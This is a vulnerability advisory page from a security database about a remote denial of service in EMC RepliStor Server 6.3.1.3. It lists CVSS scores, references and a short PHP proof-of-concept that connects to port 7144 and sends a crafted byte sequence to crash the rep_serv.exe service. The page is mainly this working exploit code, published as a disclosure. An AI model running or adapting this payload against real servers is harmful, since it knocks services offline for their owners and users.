EMC RepliStor Server (rep_serv.exe) 6.3.1.3 remote denial of service

2009-10-23 / 2009-10-24
Risk: Medium
Local: No
Remote: Yes


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

<?php /* EMC RepliStor Server (rep_serv.exe) 6.3.1.3 remote denial of service poc by Nine:Situations:Group::bellick */ $host = "192.168.0.1"; $port = 7144; $_sock = fsockopen($host, $port, $errno, $errstr, 2); if (!$fp) { echo "$errstr ($errno)\n"; } else { $_p = "\x54\x93\x00\x00\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41"; fputs($_sock, $_p); fclose($_sock); } ?> original url: http://retrogod.altervista.org/9sg_emc_repli_crash.html

References:

http://www.securityfocus.com/bid/36738
http://www.securityfocus.com/archive/1/archive/1/507322/100/0/threaded
http://retrogod.altervista.org/9sg_emc_repli_crash.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top